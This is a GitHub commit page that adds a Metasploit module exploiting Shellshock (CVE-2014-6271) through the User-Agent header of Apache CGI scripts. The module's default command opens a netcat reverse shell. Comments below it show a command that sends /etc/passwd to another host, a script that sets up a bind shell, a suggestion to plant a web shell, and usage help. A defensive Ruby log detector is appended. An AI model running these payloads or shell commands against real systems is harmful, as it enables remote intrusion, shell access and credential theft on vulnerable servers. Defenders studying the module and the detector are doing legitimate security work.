Commit
Showing 1 changed file with 49 additions and 0 deletions.
@@ -0,0 +1,49 @@ | ||
## | ||
# This module requires Metasploit: http//metasploit.com/download | ||
# Current source: https://github.com/rapid7/metasploit-framework | ||
## | ||
|
||
require 'msf/core' | ||
|
||
class Metasploit4 < Msf::Auxiliary | ||
|
||
include Msf::Exploit::Remote::HttpClient | ||
include Msf::Auxiliary::Scanner | ||
|
||
def initialize(info = {}) | ||
super(update_info(info, | ||
'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection', | ||
'Description' => %q{ | ||
This module exploits a code injection in specially crafted environment | ||
variables in Bash, specifically targeting Apache mod_cgi scripts through | ||
the HTTP_USER_AGENT variable. | ||
}, | ||
'Author' => [ | ||
'Stephane Chazelas', # Vulnerability discovery | ||
'wvu' # Metasploit module | ||
], | ||
'References' => [ | ||
['CVE', '2014-6271'], | ||
['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'], | ||
['URL', 'http://seclists.org/oss-sec/2014/q3/649'] | ||
], | ||
'DisclosureDate' => 'Sep 24 2014', | ||
'License' => MSF_LICENSE | ||
)) | ||
|
||
register_options([ | ||
OptString.new('TARGETURI', [true, 'Path to CGI script']), | ||
OptString.new('CMD', [true, 'Command to run (absolute paths required)', | ||
'/bin/nc -e /bin/sh 127.0.0.1 4444 &']) | ||
], self.class) | ||
end | ||
|
||
def run_host(ip) | ||
send_request_cgi( | ||
'method' => 'GET', | ||
'uri' => normalize_uri(target_uri.path), | ||
'agent' => "() { :;}; #{datastore['CMD']}" | ||
) | ||
end | ||
|
||
end |
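Review bot: run_host discards the return value of send_request_cgi, so a scan never reports anything per host (no print_status/print_good and no report_vuln), which leaves an Msf::Auxiliary::Scanner module silent about whether the request was even answered; capture it as `res = send_request_cgi(...)`, handle a nil response, and report the host together with the HTTP status code. Minor: the header comment URL `http//metasploit.com/download` is missing the colon after `http`.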
Awesome work!
Absolutely terrifying!
Amazing how quickly this has been created.
Great job! I tested this one and it works as expected. Works on Oracle Linux as well.
btw, the command I ran was /usr/bin/nc 10.0.0.22 < /etc/passwd
You could probably easily add an option to create a payload on the system (php or jsp shell) just using echo. Me thinks.
Oracle Linux's netcat doesn't allow -e so you have to use a complex script to get it to run.
```sh
#!/bin/sh
myvar=`echo $RANDOM`
mycommand=`mkfifo ._$myvar; nc -lk 3333 0<._$myvar | /bin/bash &>._$myvar;`
netstat -nat|grep 3333
if [[ $? -eq 0 ]] ;
then
echo "shell already started"
else
sh $mycommand &
fi
```
```
msf > search apache_mod

Matching Modules

   Name                                           Disclosure Date  Rank    Description
   auxiliary/dos/http/apache_mod_isapi            2010-03-05       normal  Apache mod_isapi Dangling Pointer
   auxiliary/shellshock/apache_mod_cgi_bash_env   2014-09-24       normal  Apache mod_cgi Bash Environment Variable Code Injection
   exploit/windows/http/apache_mod_rewrite_ldap   2006-07-28       great   Apache Module mod_rewrite LDAP Protocol Buffer Overflow
   exploit/windows/http/apache_modjk_overflow     2007-03-02       great   Apache mod_jk 1.2.20 Buffer Overflow

msf > use auxiliary/shellshock/apache_mod_cgi_bash_env
[-] Failed to load module: auxiliary/shellshock/apache_mod_cgi_bash_env
```
@mbarrerax You'll need to update your MSF installation and specify the right path:
This is what I get when I run a msfupdate:
```
root@Kali:/# msfupdate
[*]
[*] Attempting to update the Metasploit Framework...
[*]
[*] Checking for updates via the APT repository
[*] Note: expect weekly(ish) updates using this method
[*] No updates available

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
[-] Failed to load module: auxiliary/scanner/http/apache_mod_cgi_bash_env
```
This was merged to master yesterday.
How to specify the TARGETURI option?
set TARGETURI [url without square brackets]
Awesome work.

Hi Team, I am trying this script against metasploitable2. I set the RHOSTS, RPORT, and TARGETURI, then I exploit, but it doesn't return anything that makes sense. Am I doing something wrong?

@bhavinjbhatt For the module to succeed you must specify a CGI script which attempts to call Bash as TARGETURI.

@mbarrerax - I am new to Metasploit and don't know how to do what you suggested. Are you able to point me in the right direction? Thanks in advance.

Put the target URI as http://target-ip/cgi-bin/whatever.cgi or whatever.sh
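The comments above tie exposure to CGI scripts under /cgi-bin/ that invoke Bash, while the module itself delivers the `() { :;};` function-definition prefix through the User-Agent header (HTTP_USER_AGENT in the CGI environment). As an added example, not part of this commit, the Metasploit module, or any comment in the thread, here is a small Ruby detector that parses Apache combined-format access log lines and flags requests whose logged User-Agent or Referer carries that prefix, noting whether the path hits a CGI handler. The log lines are constructed samples, and the `/cgi-bin/` path test and the whitespace-tolerant pattern are detection choices assumed here, not taken from the page.

```ruby
# Added example: detector for Shellshock (CVE-2014-6271) probes in Apache
# "combined" access logs. Not part of the module or this thread.

# Combined format: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "([^"]*)"\z/

# The injected value starts with the Bash function-definition prefix "() {".
# Matched loosely (optional whitespace) so trivial spacing variants are still
# flagged; this is a detection choice assumed here.
SHELLSHOCK_RE = /\(\)\s*\{/

# Parse one combined-format line into a hash, or nil when it does not parse.
def parse_combined(line)
  m = COMBINED_RE.match(line.strip)
  return nil unless m
  http_method, path, _proto = m[3].split(' ', 3)
  { ip: m[1], time: m[2], method: http_method, path: path, status: m[4].to_i,
    referer: m[5], user_agent: m[6] }
end

# Return the flagged entries; each carries which header field matched and
# whether the request path points at a CGI handler (mod_cgi exposure).
def find_shellshock_probes(lines)
  lines.each_with_object([]) do |line, hits|
    entry = parse_combined(line)
    next unless entry
    field = %i[user_agent referer].find { |f| SHELLSHOCK_RE.match?(entry[f]) }
    next unless field
    hits << entry.merge(matched_field: field,
                        cgi_path: entry[:path].to_s.include?('/cgi-bin/'))
  end
end

# Constructed sample lines (not real traffic); the commands are harmless.
SAMPLE_LOG = [
  '203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/true"',
  '198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/env.sh HTTP/1.1" 500 0 "() {:; }; /usr/bin/id" "curl/7.37.0"',
  'garbage line that does not parse'
].freeze

if __FILE__ == $PROGRAM_NAME
  find_shellshock_probes(SAMPLE_LOG).each do |hit|
    puts "#{hit[:ip]} #{hit[:method]} #{hit[:path]} via #{hit[:matched_field]} cgi=#{hit[:cgi_path]}"
  end
end
```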
Can I just copy and paste this to create a module for metasploit PRO?
@ir8dog msfupdate